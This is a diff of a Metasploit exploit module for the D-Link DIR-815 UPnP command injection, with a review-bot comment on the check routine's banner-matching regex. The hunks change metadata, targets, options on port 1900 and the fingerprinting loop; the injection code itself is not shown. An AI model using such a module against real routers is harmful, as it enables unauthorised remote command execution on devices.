@@ -22,13 +22,13 @@ def initialize(info = {})
22
22
'Author' =>
23
23
[
24
24
'Zachary Cutlip' , # Vulnerability discovery and initial exploit
25
- 'Michael Messner <devnull@ s3cur1ty.de>' # Metasploit module and verification on other routers
25
+ 'Michael Messner <devnull[at] s3cur1ty.de>' # Metasploit module and verification on other routers
26
26
] ,
27
27
'License' => MSF_LICENSE ,
28
28
'References' =>
29
29
[
30
- [ 'URL' , 'https://github.com/zcutlip/exploit-poc/tree/master/dlink/dir-815-a1/upnp-command-injection' ] , # original exploit
31
- [ 'URL' , 'http://shadow-file.blogspot.com/2013/02/dlink-dir-815-upnp-command-injection.html' ] # original exploit
30
+ [ 'URL' , 'https://github.com/zcutlip/exploit-poc/tree/master/dlink/dir-815-a1/upnp-command-injection' ] , # original exploit
31
+ [ 'URL' , 'http://shadow-file.blogspot.com/2013/02/dlink-dir-815-upnp-command-injection.html' ] # original exploit
32
32
] ,
33
33
'DisclosureDate' => 'Feb 01 2013' ,
34
34
'Privileged' => true ,
@@ -40,21 +40,23 @@ def initialize(info = {})
40
40
'Arch' => ARCH_MIPSLE
41
41
}
42
42
] ,
43
- [ 'MIPS Big Endian' , # unknown if there are big endian devices out there
43
+ [ 'MIPS Big Endian' , # unknown if there are big endian devices out there
44
44
{
45
45
'Platform' => 'linux' ,
46
46
'Arch' => ARCH_MIPS
47
47
}
48
- ] ,
48
+ ]
49
49
] ,
50
50
'DefaultTarget' => 0
51
51
) )
52
+
52
53
register_options (
53
54
[
54
55
Opt ::RHOST ( ) ,
55
- Opt ::RPORT ( 1900 ) ,
56
+ Opt ::RPORT ( 1900 )
56
57
] , self . class )
57
58
59
+ deregister_options ( 'CMDSTAGER::DECODER' , 'CMDSTAGER::FLAVOR' )
58
60
end
59
61
60
62
def check
@@ -72,8 +74,8 @@ def check
72
74
res = nil
73
75
1 . upto ( 5 ) do
74
76
res , _ , _ = udp_sock . recvfrom ( 65535 , 1.0 )
75
- break if res and res =~ /SERVER:\ Linux,\ UPnP\/ 1.0,\ DIR-...\ Ver/mi
76
- udp_sock . sendto ( msearch , rhost , rport , 0 )
77
+ break if res and res =~ /SERVER:\ Linux,\ UPnP\/ 1\ . 0,\ DIR-...\ Ver/mi
78
+ udp_sock . sendto ( pkt , rhost , rport , 0 )
77
79
end
78
80
79
81
# UPnP response:
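Review bot: In the check loop of the last hunk, the fingerprint still has three unescaped dots in `DIR-...`, and with the `m` flag each of them also matches a newline, so the pattern accepts any three characters after `DIR-` and can match across header lines. The commit escapes the dot in `1\.0` but leaves these; if only numeric model numbers are meant, `DIR-\d{3}` without the `m` flag says so explicitly, and if the wildcard is deliberate a short comment such as `# any three-character DIR model` would record that. `res and res =~ ...` would also read more conventionally as `res && res =~ ...`. A banner match only shows how the device identifies itself, so the result that check returns (outside this hunk) should presumably not claim more than detection. The body of check starts and ends outside the hunk.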